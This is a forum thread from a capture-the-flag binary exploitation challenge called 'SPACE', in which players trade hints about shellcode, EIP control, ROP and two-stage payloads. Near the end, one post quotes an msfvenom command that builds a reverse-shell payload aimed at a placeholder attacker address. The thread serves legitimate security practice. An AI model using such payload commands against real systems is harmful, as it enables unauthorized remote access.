SPACE [PWN]

Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens…

@Chainmanner said:

Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens…

There is multiple ways to solve this one, you need to explain more on what you have done.
It can be the execution env for example, or something else.

Type your comment> @Chainmanner said:

Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens…

This mainly happens due to some type of stack misalignment error. At least what I have face in the past. But nothing much can be said without looking at the payload that you’re sending.

hi i’m stuck. I can rewrite $eip to any value, but it doesn’t give much result.
I can’t use ret2leb, because I don’t know the “libc” address.
maybe i should focus on plt and got sections. I need a hint.
tell me what strategy should i follow?
or write to me in HP with a more detailed explanation.

thank you in advance!

hi i’m currently stuck. I do have kind of control of eip what the various things i tried do either only work locally or dont work at all. could someone please give me a hint on how to proceed or pm me for more details.
thx

Not “Very easy” but fun :slight_smile:

done with rop . can anybody pm me the intended way .

edit : got it

Finally managed to solve it ( I guess ) is the intended way, but not sure about that. If someone can pm me regarding the rop approach that would be awsome.

Type your comment> @R4J said:

Type your comment> @Rembown said:

Was anyone able to do this without ropping? Seems it should be doable from looking at the mitigations on the binary

Yes, the intended way was without using rop.

Hi, can I pm you regarding my solution; just to check if this was the intented way.
best

EDIT: ok after a mess I figured it out. I used to Sp**t my shellcode. Looking for someone to compare my solution to check if I solved it the intended way.

My exploit only works on gdb. I’ve also turned off address randomization and unsetted gdb env var.
Can anybody give me a nudge on what I’m missing?

Did it, if someone needs help

Hi!, how can I create a small shellcode? The ones created by msfvenom are too large.
Thanks in advance

Done and dusted! That was fun!

I have split the shellcode into 2 seperate parts. After lots of experimenting I got it to work in gdb. However, when running it outside of gdb, I get a segmentation fault. I think this is because the kernel pushes things like enviroment variables, params etc to the stack, and thus invalidating any hardcoded adresses in the exploit. Did anyone get around this?

If someone did it the way it was supposed to be done please PM me, I need some help, can’t understand how all functions work together and how the stack works in this case. the variable in vuln is 10bytes long but 0x14 (20) bytes are allocated instead…

Could someone who has solved this challenge PM me? I need a nudge.

Hi everybody! I managed to solve the challenge in the intended way, at least I think it is. Could somebody PM me to discuss the solution or other alternative ones?

Please PM with help for reverse shell. I have something working locally. I think I solved the ‘space’ issue, but then I’ve tried adding on a payload like msfvenom -p linux/x86/shell_reverse_tcp -f raw -b '\x00\x0a\x20' LHOST=MYIP LPORT=MYPORT -o msfpayload’ and it works locally but not remotely. I’ve tried making sure my firewall is open.

if anyone manage to solve it using ROP, please let me know (:

I have solved it with a two stage payload.